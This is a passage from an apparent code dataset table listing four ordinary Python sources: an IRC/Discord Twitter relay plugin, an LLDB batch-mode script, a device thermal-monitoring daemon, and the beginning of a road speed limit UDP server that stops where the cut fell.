source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
tweets.py | # -*- coding: utf-8 -*-
import html
import threading
import time
import irc3
import json
import requests
from irc3.plugins.command import command
from irc3.utils import as_list
from twitter.stream import Timeout, HeartbeatTimeout, Hangup
__doc__ = '''
==========================================
:mod:`tweets` Feeds plugin
==========================================
Post Twitter Updates into channels.
You must configure `irc3.plugins.social` properly.
Additionally, your config has to contain something like this:
[tweets]
## Optional: default channel
tweet_channels = #channel
## Optional: customize message in channel
tweet_format = "@{screen_name}: {text}"
## some twitter feeds:
identifier.account = screen_name
identifier.channels = #channel1 #channel2
## these are just for Discord
webhook_username = Username shown as bot name
webhook_avatar = https://... (URL to an avatar image)
identifier.webhook = https://discordapp.com/api/webhooks/...
[...]
'''
@irc3.plugin
class Tweets:
requires = [
'irc3.plugins.social',
]
def __init__(self, bot):
self.bot = bot
self.twitter_stream = self.bot.get_social_connection(id='twitter_stream')
self.twitter_api = self.bot.get_social_connection(id='twitter')
self.twitter_channels = {}
self.twitter_ids = {}
self.twitter_webhooks = {}
self.twitter_filters = {}
self.twitter_connected = False
self.config = self.bot.config.get(__name__, {})
self.tweet_channels = as_list(self.config.get('tweet_channels'))
self.tweet_format = self.config.get('tweet_format', '@{screen_name}: {text}')
self.webhook_username = self.config.get('webhook_username')
self.webhook_avatar = self.config.get('webhook_avatar')
def connect_twitter(self):
for config_key, config_value in self.config.items():
if config_value and str(config_key).endswith('.account'):
screen_name = config_value
details = self.twitter_api.users.show(screen_name=screen_name)
self.twitter_ids[details["id_str"]] = screen_name
self.twitter_channels[screen_name.lower()] = self.tweet_channels
config_id = config_key[:-8]
if self.config.get(config_id + '.channels'):
self.twitter_channels[screen_name.lower()] = as_list(self.config.get(config_id+'.channels'))
self.twitter_webhooks[screen_name.lower()] = self.config.get(config_id+'.webhook')
self.twitter_filters[screen_name.lower()] = as_list(self.config.get(config_id+'.filters'))
threading.Thread(target=self.receive_stream).start()
def receive_stream(self):
exception_count = 0
loop_count = 0
while True:
try:
follow = ','.join(self.twitter_ids.keys())
stream = self.twitter_stream.statuses.filter(follow=follow)
self.twitter_connected = True
self.bot.log.info('Twitter connected')
self.bot.log.info('IDs: %s' % follow)
for tweet in stream:
self.bot.loop.run_in_executor(None, self.handle_data, tweet)
self.bot.log.info('Twitter disconnected')
except Exception as e:
self.bot.log.info('Twitter connection lost')
exception_count = exception_count + 1
self.bot.log.info('Twitter EXCEPTION %d' % exception_count)
self.bot.log.exception(e)
time.sleep(10 * exception_count)
finally:
loop_count = loop_count + 1
time.sleep(20 + loop_count)
self.bot.log.info('Twitter connection retrying')
self.twitter_connected = False
def handle_data(self, data):
if data is None:
self.bot.log.info('Twitter sent no data')
elif data is Timeout:
self.bot.log.info('Twitter sent a timeout')
elif data is Hangup:
self.bot.log.info('Twitter sent a hangup')
elif data is HeartbeatTimeout:
self.bot.log.info('Twitter sent a heartbeat timeout')
elif 'retweeted_status' in data:
self.bot.log.debug('Twitter sent retweet %s' % data['id_str'])
elif 'delete' in data:
delete_user = data['delete']['status']['user_id_str']
if delete_user in self.twitter_ids:
delete_user = '@%s' % self.twitter_ids[delete_user]
self.bot.log.debug('Twitter sent deletion %s/%s' % (delete_user, data['delete']['status']['id_str']))
elif 'limit' in data:
self.bot.log.critical('Twitter sent LIMIT NOTICE')
self.bot.log.info(json.dumps(data))
elif 'text' in data:
self.bot.log.debug('Twitter sent tweet @%s/%s' % (data['user']['screen_name'], data['id_str']) )
self.handle_tweet(data)
#self.bot.log.debug(json.dumps(data))
else:
self.bot.log.warn('Twitter sent unknown data')
self.bot.log.info(json.dumps(data))
def handle_tweet(self, tweet):
screen_name = tweet['user']['screen_name']
user_name = tweet['user']['name']
url = 'https://twitter.com/%s/status/%s' % (screen_name, tweet['id_str'])
text = html.unescape(tweet['text'])
if 'extended_tweet' in tweet and 'full_text' in tweet['extended_tweet']:
text = html.unescape(tweet['extended_tweet']['full_text'])
user = tweet['user']['screen_name'].lower()
user_tweet = (user in self.twitter_channels or user in self.twitter_webhooks) \
and (tweet['in_reply_to_screen_name'] == None or tweet['in_reply_to_screen_name'].lower() == user) \
and (not text.startswith('@') or text.lower().startswith('@' + user)) \
and (not self.text_filtered(user, text))
if user_tweet:
if user in self.twitter_channels:
for tweet_channel in self.twitter_channels[user]:
self.bot.privmsg(tweet_channel,
self.tweet_format.format(
screen_name=screen_name, user_name=user_name, text=text, tweet=tweet, url=url))
self.bot.log.debug('Sent tweet %s to %s' % (url, ' '.join(self.twitter_channels[user])))
if self.twitter_webhooks[user]:
self.send_webhook(self.twitter_webhooks[user], screen_name, user_name, text, tweet, url)
else:
self.bot.log.debug('Ignored reply or filtered message %s' % url)
def text_filtered(self, user, text):
if not user in self.twitter_filters:
return False
if not self.twitter_filters[user]:
return False
text_lower = text.lower()
for twitter_filter in self.twitter_filters[user]:
if twitter_filter.lower() in text_lower:
#self.bot.log.debug('FOUND FILTER: %s' % twitter_filter)
return False
#self.bot.log.debug('FILTERED: %s' % text)
return True
def send_webhook(self, webhook, screen_name, user_name, text, tweet, url):
try:
message = {'embeds': []}
if self.webhook_username:
message['username'] = self.webhook_username
if self.webhook_avatar:
message['avatar_url'] = self.webhook_avatar
text_message = {
'description': text,
'url': url,
'title': '@%s' % screen_name,
'color': 33972, #alternative: 44269
'thumbnail': {
'url': tweet['user']['profile_image_url_https']
}
}
message['embeds'].append(text_message)
# Look for the best place to get media
media_base = tweet
if 'extended_tweet' in tweet:
media_base = tweet['extended_tweet']
media = []
if 'extended_entities' in media_base and 'media' in media_base['extended_entities']:
media = media_base['extended_entities']['media']
elif 'entities' in media_base and 'media' in media_base['entities']:
media = media_base['entities']['media']
for medium in media:
media_message = text_message
if 'image' in text_message or 'video' in text_message:
media_message = {'url': url}
message['embeds'].append(media_message)
if 'media_url' in medium:
media_message['image'] = { 'url': medium['media_url'] }
if 'media_url_https' in medium:
media_message['image'] = { 'url': medium['media_url_https'] }
# Videos are not supported yet, but who knows?
if 'video_info' in medium and 'variants' in medium['video_info'] \
and len(medium['video_info']['variants']) > 0 \
and 'url' in medium['video_info']['variants'][0]:
media_message['video'] = {'url': medium['video_info']['variants'][0]['url']}
# Until then at least mark the videos
if medium['type'] != 'photo':
if medium['type'] == 'animated_gif':
media_message['footer'] = {'text': '🎞️ GIF'}
elif medium['type'] == 'video':
media_message['footer'] = {'text': '🎞️ Video'}
else:
media_message['footer'] = {'text': '🎞️ ?'}
#self.bot.log.debug(json.dumps(message))
reply = requests.post(webhook, json=message)
if reply.status_code != 204:
self.bot.log.info(webhook)
self.bot.log.info(json.dumps(message))
self.bot.log.info(reply)
self.bot.log.debug('Sent tweet %s to %s' % (url, webhook))
except Exception as e:
self.bot.log.exception(e)
def connection_made(self):
if not self.twitter_connected:
self.connect_twitter()
@command(permission='admin')
def status(self, mask, target, args):
"""Handle a specific tweet (again)
%%status <id>
"""
status_id = args['<id>']
self.bot.log.info('Fetching and handling tweet: %s' % status_id)
tweet = self.twitter_api.statuses.show(id=status_id, include_entities="true", tweet_mode="compability")
tweet['extended_tweet'] = self.twitter_api.statuses.show(id=status_id, include_entities="true", tweet_mode="extended")
self.bot.log.debug(json.dumps(tweet))
self.handle_tweet(tweet)
return 'Loaded and handled tweet: @%s/%s' % (tweet['user']['screen_name'], tweet['id_str'])
|
lldb_batchmode.py | # This script allows to use LLDB in a way similar to GDB's batch mode. That is, given a text file
# containing LLDB commands (one command per line), this script will execute the commands one after
# the other.
# LLDB also has the -s and -S commandline options which also execute a list of commands from a text
# file. However, this command are execute `immediately`: the command of a `run` or `continue`
# command will be executed immediately after the `run` or `continue`, without waiting for the next
# breakpoint to be hit. This a command sequence like the following will not yield reliable results:
#
# break 11
# run
# print x
#
# Most of the time the `print` command will be executed while the program is still running will thus
# fail. Using this Python script, the above will work as expected.
from __future__ import print_function
import lldb
import os
import sys
import threading
import re
import time
try:
import thread
except ModuleNotFoundError:
# The `thread` module was renamed to `_thread` in Python 3.
import _thread as thread
# Set this to True for additional output
DEBUG_OUTPUT = False
def print_debug(s):
"""Print something if DEBUG_OUTPUT is True"""
global DEBUG_OUTPUT
if DEBUG_OUTPUT:
print("DEBUG: " + str(s))
def normalize_whitespace(s):
"""Replace newlines, tabs, multiple spaces, etc with exactly one space"""
return re.sub("\s+", " ", s)
def breakpoint_callback(frame, bp_loc, dict):
"""This callback is registered with every breakpoint and makes sure that the
frame containing the breakpoint location is selected"""
print("Hit breakpoint " + str(bp_loc))
# Select the frame and the thread containing it
frame.thread.process.SetSelectedThread(frame.thread)
frame.thread.SetSelectedFrame(frame.idx)
# Returning True means that we actually want to stop at this breakpoint
return True
# This is a list of breakpoints that are not registered with the breakpoint callback. The list is
# populated by the breakpoint listener and checked/emptied whenever a command has been executed
new_breakpoints = []
# This set contains all breakpoint ids that have already been registered with a callback, and is
# used to avoid hooking callbacks into breakpoints more than once
registered_breakpoints = set()
def execute_command(command_interpreter, command):
"""Executes a single CLI command"""
global new_breakpoints
global registered_breakpoints
res = lldb.SBCommandReturnObject()
print(command)
command_interpreter.HandleCommand(command, res)
if res.Succeeded():
if res.HasResult():
print(normalize_whitespace(res.GetOutput() or ''), end='\n')
# If the command introduced any breakpoints, make sure to register
# them with the breakpoint
# callback
while len(new_breakpoints) > 0:
res.Clear()
breakpoint_id = new_breakpoints.pop()
if breakpoint_id in registered_breakpoints:
print_debug("breakpoint with id %s is already registered. Ignoring." %
str(breakpoint_id))
else:
print_debug("registering breakpoint callback, id = " + str(breakpoint_id))
callback_command = ("breakpoint command add -F breakpoint_callback " +
str(breakpoint_id))
command_interpreter.HandleCommand(callback_command, res)
if res.Succeeded():
print_debug("successfully registered breakpoint callback, id = " +
str(breakpoint_id))
registered_breakpoints.add(breakpoint_id)
else:
print("Error while trying to register breakpoint callback, id = " +
str(breakpoint_id))
else:
print(res.GetError())
def start_breakpoint_listener(target):
"""Listens for breakpoints being added and adds new ones to the callback
registration list"""
listener = lldb.SBListener("breakpoint listener")
def listen():
event = lldb.SBEvent()
try:
while True:
if listener.WaitForEvent(120, event):
if lldb.SBBreakpoint.EventIsBreakpointEvent(event) and \
lldb.SBBreakpoint.GetBreakpointEventTypeFromEvent(event) == \
lldb.eBreakpointEventTypeAdded:
global new_breakpoints
breakpoint = lldb.SBBreakpoint.GetBreakpointFromEvent(event)
print_debug("breakpoint added, id = " + str(breakpoint.id))
new_breakpoints.append(breakpoint.id)
except:
print_debug("breakpoint listener shutting down")
# Start the listener and let it run as a daemon
listener_thread = threading.Thread(target=listen)
listener_thread.daemon = True
listener_thread.start()
# Register the listener with the target
target.GetBroadcaster().AddListener(listener, lldb.SBTarget.eBroadcastBitBreakpointChanged)
def start_watchdog():
"""Starts a watchdog thread that will terminate the process after a certain
period of time"""
watchdog_start_time = time.clock()
watchdog_max_time = watchdog_start_time + 30
def watchdog():
while time.clock() < watchdog_max_time:
time.sleep(1)
print("TIMEOUT: lldb_batchmode.py has been running for too long. Aborting!")
thread.interrupt_main()
# Start the listener and let it run as a daemon
watchdog_thread = threading.Thread(target=watchdog)
watchdog_thread.daemon = True
watchdog_thread.start()
####################################################################################################
# ~main
####################################################################################################
if len(sys.argv) != 3:
print("usage: python lldb_batchmode.py target-path script-path")
sys.exit(1)
target_path = sys.argv[1]
script_path = sys.argv[2]
print("LLDB batch-mode script")
print("----------------------")
print("Debugger commands script is '%s'." % script_path)
print("Target executable is '%s'." % target_path)
print("Current working directory is '%s'" % os.getcwd())
# Start the timeout watchdog
start_watchdog()
# Create a new debugger instance
debugger = lldb.SBDebugger.Create()
# When we step or continue, don't return from the function until the process
# stops. We do this by setting the async mode to false.
debugger.SetAsync(False)
# Create a target from a file and arch
print("Creating a target for '%s'" % target_path)
target_error = lldb.SBError()
target = debugger.CreateTarget(target_path, None, None, True, target_error)
if not target:
print("Could not create debugging target '" + target_path + "': " +
str(target_error) + ". Aborting.", file=sys.stderr)
sys.exit(1)
# Register the breakpoint callback for every breakpoint
start_breakpoint_listener(target)
command_interpreter = debugger.GetCommandInterpreter()
try:
script_file = open(script_path, 'r')
for line in script_file:
command = line.strip()
if command == "run" or command == "r" or re.match("^process\s+launch.*", command):
# Before starting to run the program, let the thread sleep a bit, so all
# breakpoint added events can be processed
time.sleep(0.5)
if command != '':
execute_command(command_interpreter, command)
except IOError as e:
print("Could not read debugging script '%s'." % script_path, file=sys.stderr)
print(e, file=sys.stderr)
print("Aborting.", file=sys.stderr)
sys.exit(1)
finally:
debugger.Terminate()
script_file.close()
|
thermald.py | #!/usr/bin/env python3
import datetime
import os
import queue
import threading
import time
from collections import OrderedDict, namedtuple
from pathlib import Path
from typing import Dict, Optional, Tuple
import psutil
import cereal.messaging as messaging
from cereal import log
from common.dict_helpers import strip_deprecated_keys
from common.filter_simple import FirstOrderFilter
from common.params import Params
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from selfdrive.hardware import EON, HARDWARE, PC, TICI
from selfdrive.loggerd.config import get_available_percent
from selfdrive.statsd import statlog
from selfdrive.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import PowerMonitoring
from selfdrive.thermald.fan_controller import EonFanController, UnoFanController, TiciFanController
from selfdrive.version import terms_version, training_version
ThermalStatus = log.DeviceState.ThermalStatus
NetworkType = log.DeviceState.NetworkType
NetworkStrength = log.DeviceState.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
TEMP_TAU = 5. # 5s time constant
DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
PANDA_STATES_TIMEOUT = int(1000 * 2.5 * DT_TRML) # 2.5x the expected pandaState frequency
ThermalBand = namedtuple("ThermalBand", ['min_temp', 'max_temp'])
HardwareState = namedtuple("HardwareState", ['network_type', 'network_metered', 'network_strength', 'network_info', 'nvme_temps', 'modem_temps'])
# List of thermal bands. We will stay within this region as long as we are within the bounds.
# When exiting the bounds, we'll jump to the lower or higher band. Bands are ordered in the dict.
THERMAL_BANDS = OrderedDict({
ThermalStatus.green: ThermalBand(None, 80.0),
ThermalStatus.yellow: ThermalBand(75.0, 96.0),
ThermalStatus.red: ThermalBand(80.0, 107.),
ThermalStatus.danger: ThermalBand(94.0, None),
})
# Override to highest thermal band when offroad and above this temp
OFFROAD_DANGER_TEMP = 79.5 if TICI else 70.0
prev_offroad_states: Dict[str, Tuple[bool, Optional[str]]] = {}
tz_by_type: Optional[Dict[str, int]] = None
def populate_tz_by_type():
global tz_by_type
tz_by_type = {}
for n in os.listdir("/sys/devices/virtual/thermal"):
if not n.startswith("thermal_zone"):
continue
with open(os.path.join("/sys/devices/virtual/thermal", n, "type")) as f:
tz_by_type[f.read().strip()] = int(n.lstrip("thermal_zone"))
def read_tz(x):
if x is None:
return 0
if isinstance(x, str):
if tz_by_type is None:
populate_tz_by_type()
x = tz_by_type[x]
try:
with open(f"/sys/devices/virtual/thermal/thermal_zone{x}/temp") as f:
return int(f.read())
except FileNotFoundError:
return 0
def read_thermal(thermal_config):
dat = messaging.new_message('deviceState')
dat.deviceState.cpuTempC = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
dat.deviceState.gpuTempC = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.deviceState.memoryTempC = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.deviceState.ambientTempC = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.deviceState.pmicTempC = [read_tz(z) / thermal_config.pmic[1] for z in thermal_config.pmic[0]]
return dat
def set_offroad_alert_if_changed(offroad_alert: str, show_alert: bool, extra_text: Optional[str]=None):
if prev_offroad_states.get(offroad_alert, None) == (show_alert, extra_text):
return
prev_offroad_states[offroad_alert] = (show_alert, extra_text)
set_offroad_alert(offroad_alert, show_alert, extra_text)
def hw_state_thread(end_event, hw_queue):
"""Handles non critical hardware state, and sends over queue"""
count = 0
registered_count = 0
prev_hw_state = None
modem_version = None
modem_nv = None
modem_configured = False
while not end_event.is_set():
# these are expensive calls. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
modem_temps = HARDWARE.get_modem_temperatures()
if len(modem_temps) == 0 and prev_hw_state is not None:
modem_temps = prev_hw_state.modem_temps
# Log modem version once
if TICI and ((modem_version is None) or (modem_nv is None)):
modem_version = HARDWARE.get_modem_version() # pylint: disable=assignment-from-none
modem_nv = HARDWARE.get_modem_nv() # pylint: disable=assignment-from-none
if (modem_version is not None) and (modem_nv is not None):
cloudlog.event("modem version", version=modem_version, nv=modem_nv)
hw_state = HardwareState(
network_type=network_type,
network_metered=HARDWARE.get_network_metered(network_type),
network_strength=HARDWARE.get_network_strength(network_type),
network_info=HARDWARE.get_network_info(),
nvme_temps=HARDWARE.get_nvme_temperatures(),
modem_temps=modem_temps,
)
try:
hw_queue.put_nowait(hw_state)
except queue.Full:
pass
if TICI and (hw_state.network_info is not None) and (hw_state.network_info.get('state', None) == "REGISTERED"):
registered_count += 1
else:
registered_count = 0
if registered_count > 10:
cloudlog.warning(f"Modem stuck in registered state {hw_state.network_info}. nmcli conn up lte")
os.system("nmcli conn up lte")
registered_count = 0
# TODO: remove this once the config is in AGNOS
if not modem_configured and len(HARDWARE.get_sim_info().get('sim_id', '')) > 0:
cloudlog.warning("configuring modem")
HARDWARE.configure_modem()
modem_configured = True
prev_hw_state = hw_state
except Exception:
cloudlog.exception("Error getting hardware state")
count += 1
time.sleep(DT_TRML)
def thermald_thread(end_event, hw_queue):
pm = messaging.PubMaster(['deviceState'])
sm = messaging.SubMaster(["peripheralState", "gpsLocationExternal", "controlsState", "pandaStates"], poll=["pandaStates"])
count = 0
onroad_conditions: Dict[str, bool] = {
"ignition": False,
}
startup_conditions: Dict[str, bool] = {}
startup_conditions_prev: Dict[str, bool] = {}
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
usb_power = True
last_hw_state = HardwareState(
network_type=NetworkType.none,
network_metered=False,
network_strength=NetworkStrength.unknown,
network_info=None,
nvme_temps=[],
modem_temps=[],
)
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
temp_filter = FirstOrderFilter(0., TEMP_TAU, DT_TRML)
should_start_prev = False
in_car = False
is_uno = False
engaged_prev = False
params = Params()
power_monitor = PowerMonitoring()
HARDWARE.initialize_hardware()
thermal_config = HARDWARE.get_thermal_config()
fan_controller = None
while not end_event.is_set():
sm.update(PANDA_STATES_TIMEOUT)
pandaStates = sm['pandaStates']
peripheralState = sm['peripheralState']
msg = read_thermal(thermal_config)
if sm.updated['pandaStates'] and len(pandaStates) > 0:
# Set ignition based on any panda connected
onroad_conditions["ignition"] = any(ps.ignitionLine or ps.ignitionCan for ps in pandaStates if ps.pandaType != log.PandaState.PandaType.unknown)
pandaState = pandaStates[0]
in_car = pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected
usb_power = peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client
# Setup fan handler on first connect to panda
if fan_controller is None and peripheralState.pandaType != log.PandaState.PandaType.unknown:
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
if TICI:
fan_controller = TiciFanController()
elif is_uno or PC:
fan_controller = UnoFanController()
else:
fan_controller = EonFanController()
try:
last_hw_state = hw_queue.get_nowait()
except queue.Empty:
pass
msg.deviceState.freeSpacePercent = get_available_percent(default=100.0)
msg.deviceState.memoryUsagePercent = int(round(psutil.virtual_memory().percent))
msg.deviceState.cpuUsagePercent = [int(round(n)) for n in psutil.cpu_percent(percpu=True)]
msg.deviceState.gpuUsagePercent = int(round(HARDWARE.get_gpu_usage_percent()))
msg.deviceState.networkType = last_hw_state.network_type
msg.deviceState.networkMetered = last_hw_state.network_metered
msg.deviceState.networkStrength = last_hw_state.network_strength
if last_hw_state.network_info is not None:
msg.deviceState.networkInfo = last_hw_state.network_info
msg.deviceState.nvmeTempC = last_hw_state.nvme_temps
msg.deviceState.modemTempC = last_hw_state.modem_temps
msg.deviceState.screenBrightnessPercent = HARDWARE.get_screen_brightness()
msg.deviceState.batteryPercent = HARDWARE.get_battery_capacity()
msg.deviceState.batteryCurrent = HARDWARE.get_battery_current()
msg.deviceState.usbOnline = HARDWARE.get_usb_present()
current_filter.update(msg.deviceState.batteryCurrent / 1e6)
max_comp_temp = temp_filter.update(
max(max(msg.deviceState.cpuTempC), msg.deviceState.memoryTempC, max(msg.deviceState.gpuTempC))
)
if fan_controller is not None:
msg.deviceState.fanSpeedPercentDesired = fan_controller.update(max_comp_temp, onroad_conditions["ignition"])
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
if is_offroad_for_5_min and max_comp_temp > OFFROAD_DANGER_TEMP:
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
thermal_status = ThermalStatus.danger
else:
current_band = THERMAL_BANDS[thermal_status]
band_idx = list(THERMAL_BANDS.keys()).index(thermal_status)
if current_band.min_temp is not None and max_comp_temp < current_band.min_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx - 1]
elif current_band.max_temp is not None and max_comp_temp > current_band.max_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx + 1]
# **** starting logic ****
# Ensure date/time are valid
now = datetime.datetime.utcnow()
startup_conditions["time_valid"] = (now.year > 1020) or (now.year == 1020 and now.month >= 10)
set_offroad_alert_if_changed("Offroad_InvalidTime", (not startup_conditions["time_valid"]))
startup_conditions["up_to_date"] = params.get("Offroad_ConnectivityNeeded") is None or params.get_bool("DisableUpdates") or params.get_bool("SnoozeUpdate")
startup_conditions["not_uninstalling"] = not params.get_bool("DoUninstall")
startup_conditions["accepted_terms"] = params.get("HasAcceptedTerms") == terms_version
# with 2% left, we killall, otherwise the phone will take a long time to boot
startup_conditions["free_space"] = msg.deviceState.freeSpacePercent > 2
startup_conditions["completed_training"] = params.get("CompletedTrainingVersion") == training_version or \
params.get_bool("Passive")
startup_conditions["not_driver_view"] = not params.get_bool("IsDriverViewEnabled")
startup_conditions["not_taking_snapshot"] = not params.get_bool("IsTakingSnapshot")
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
onroad_conditions["device_temp_good"] = thermal_status < ThermalStatus.danger
set_offroad_alert_if_changed("Offroad_TemperatureTooHigh", (not onroad_conditions["device_temp_good"]))
# TODO: this should move to TICI.initialize_hardware, but we currently can't import params there
if TICI:
if not os.path.isfile("/persist/comma/living-in-the-moment"):
if not Path("/data/media").is_mount():
set_offroad_alert_if_changed("Offroad_StorageMissing", True)
else:
# check for bad NVMe
try:
with open("/sys/block/nvme0n1/device/model") as f:
model = f.read().strip()
if not model.startswith("Samsung SSD 980") and params.get("Offroad_BadNvme") is None:
set_offroad_alert_if_changed("Offroad_BadNvme", True)
cloudlog.event("Unsupported NVMe", model=model, error=True)
except Exception:
pass
# Handle offroad/onroad transition
should_start = all(onroad_conditions.values())
if started_ts is None:
should_start = should_start and all(startup_conditions.values())
if should_start != should_start_prev or (count == 0):
params.put_bool("IsOnroad", should_start)
params.put_bool("IsOffroad", not should_start)
params.put_bool("IsEngaged", False)
engaged_prev = False
HARDWARE.set_power_save(not should_start)
if sm.updated['controlsState']:
engaged = sm['controlsState'].enabled
if engaged != engaged_prev:
params.put_bool("IsEngaged", engaged)
engaged_prev = engaged
try:
with open('/dev/kmsg', 'w') as kmsg:
kmsg.write(f"<3>[thermald] engaged: {engaged}\n")
except Exception:
pass
if should_start:
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
else:
if onroad_conditions["ignition"] and (startup_conditions != startup_conditions_prev):
cloudlog.event("Startup blocked", startup_conditions=startup_conditions, onroad_conditions=onroad_conditions)
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
# Offroad power monitoring
power_monitor.calculate(peripheralState, onroad_conditions["ignition"])
msg.deviceState.offroadPowerUsageUwh = power_monitor.get_power_used()
msg.deviceState.carBatteryCapacityUwh = max(0, power_monitor.get_car_battery_capacity())
current_power_draw = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power_draw is not None:
statlog.sample("power_draw", current_power_draw)
msg.deviceState.powerDrawW = current_power_draw
else:
msg.deviceState.powerDrawW = 0
# Check if we need to disable charging (handled by boardd)
msg.deviceState.chargingDisabled = power_monitor.should_disable_charging(onroad_conditions["ignition"], in_car, off_ts)
# Check if we need to shut down
if power_monitor.should_shutdown(peripheralState, onroad_conditions["ignition"], in_car, off_ts, started_seen):
cloudlog.warning(f"shutting device down, offroad since {off_ts}")
params.put_bool("DoShutdown", True)
msg.deviceState.chargingError = current_filter.x > 0. and msg.deviceState.batteryPercent < 90 # if current is positive, then battery is being discharged
msg.deviceState.started = started_ts is not None
msg.deviceState.startedMonoTime = int(1e9*(started_ts or 0))
last_ping = params.get("LastAthenaPingTime")
if last_ping is not None:
msg.deviceState.lastAthenaPingTime = int(last_ping)
msg.deviceState.thermalStatus = thermal_status
pm.send("deviceState", msg)
if EON and not is_uno:
set_offroad_alert_if_changed("Offroad_ChargeDisabled", (not usb_power))
should_start_prev = should_start
startup_conditions_prev = startup_conditions.copy()
# Log to statsd
statlog.gauge("free_space_percent", msg.deviceState.freeSpacePercent)
statlog.gauge("gpu_usage_percent", msg.deviceState.gpuUsagePercent)
statlog.gauge("memory_usage_percent", msg.deviceState.memoryUsagePercent)
for i, usage in enumerate(msg.deviceState.cpuUsagePercent):
statlog.gauge(f"cpu{i}_usage_percent", usage)
for i, temp in enumerate(msg.deviceState.cpuTempC):
statlog.gauge(f"cpu{i}_temperature", temp)
for i, temp in enumerate(msg.deviceState.gpuTempC):
statlog.gauge(f"gpu{i}_temperature", temp)
statlog.gauge("memory_temperature", msg.deviceState.memoryTempC)
statlog.gauge("ambient_temperature", msg.deviceState.ambientTempC)
for i, temp in enumerate(msg.deviceState.pmicTempC):
statlog.gauge(f"pmic{i}_temperature", temp)
for i, temp in enumerate(last_hw_state.nvme_temps):
statlog.gauge(f"nvme_temperature{i}", temp)
for i, temp in enumerate(last_hw_state.modem_temps):
statlog.gauge(f"modem_temperature{i}", temp)
statlog.gauge("fan_speed_percent_desired", msg.deviceState.fanSpeedPercentDesired)
statlog.gauge("screen_brightness_percent", msg.deviceState.screenBrightnessPercent)
# report to server once every 10 minutes
if (count % int(600. / DT_TRML)) == 0:
if EON and started_ts is None and msg.deviceState.memoryUsagePercent > 40:
cloudlog.event("High offroad memory usage", mem=msg.deviceState.memoryUsagePercent)
cloudlog.event("STATUS_PACKET",
count=count,
pandaStates=[strip_deprecated_keys(p.to_dict()) for p in pandaStates],
peripheralState=strip_deprecated_keys(peripheralState.to_dict()),
location=(strip_deprecated_keys(sm["gpsLocationExternal"].to_dict()) if sm.alive["gpsLocationExternal"] else None),
deviceState=strip_deprecated_keys(msg.to_dict()))
count += 1
def main():
hw_queue = queue.Queue(maxsize=1)
end_event = threading.Event()
threads = [
threading.Thread(target=hw_state_thread, args=(end_event, hw_queue)),
threading.Thread(target=thermald_thread, args=(end_event, hw_queue)),
]
for t in threads:
t.start()
try:
while True:
time.sleep(1)
if not all(t.is_alive() for t in threads):
break
finally:
end_event.set()
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
road_speed_limiter.py | import json
import select
import threading
import time
import socket
import fcntl
import struct
from threading import Thread
from cereal import messaging
from common.params import Params
from common.numpy_fast import interp
from common.realtime import sec_since_boot
from selfdrive.kegman_kans_conf import kegman_kans_conf
kegman_kans = kegman_kans_conf()
CAMERA_SPEED_FACTOR = float(kegman_kans.conf['CAMERA_SPEED_FACTOR'])
class Port:
BROADCAST_PORT = 2899
RECEIVE_PORT = 2843
LOCATION_PORT = 2911
class RoadLimitSpeedServer:
def __init__(self):
self.json_road_limit = None
self.active = 0
self.last_updated = 0
self.last_updated_active = 0
self.last_exception = None
self.lock = threading.Lock()
self.remote_addr = None
broadcast = Thread(target=self.broadcast_thread, args=[])
broadcast.setDaemon(True)
broadcast.start()
#gps = Thread(target=self.gps_thread, args=[])
#gps.setDaemon(True)
#gps.start()
def gps_thread(self):
sm = messaging.SubMaster(['gpsLocationExternal'], poll=['gpsLocationExternal'])
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
while True:
try:
sm.update()
if self.remote_addr is not None and sm.updated['gpsLocationExternal']:
location = sm['gpsLocationExternal']
json_location = json.dumps([
location.latitude,
location.longitude,
location.altitude,
location.speed,
location.bearingDeg,
location.accuracy,
location.timestamp,
location.source,
location.vNED,
location.verticalAccuracy,
location.bearingAccuracyDeg,
location.speedAccuracy,
])
address = (self.remote_addr[0], Port.LOCATION_PORT)
sock.sendto(json_location.encode(), address)
else:
time.sleep(1.)
except Exception as e:
print("exception", e)
time.sleep(1.)
def get_broadcast_address(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip = fcntl.ioctl(
s.fileno(),
0x8919,
struct.pack('256s', 'wlan0'.encode('utf-8'))
)[20:24]
return socket.inet_ntoa(ip)
except:
return None
def broadcast_thread(self):
broadcast_address = None
frame = 0
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
try:
if broadcast_address is None or frame % 10 == 0:
broadcast_address = self.get_broadcast_address()
print('broadcast_address', broadcast_address)
if broadcast_address is not None:
address = (broadcast_address, Port.BROADCAST_PORT)
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), address)
except:
pass
time.sleep(5.)
frame += 1
except:
pass
def udp_recv(self, sock):
ret = False
try:
ready = select.select([sock], [], [], 1.)
ret = bool(ready[0])
if ret:
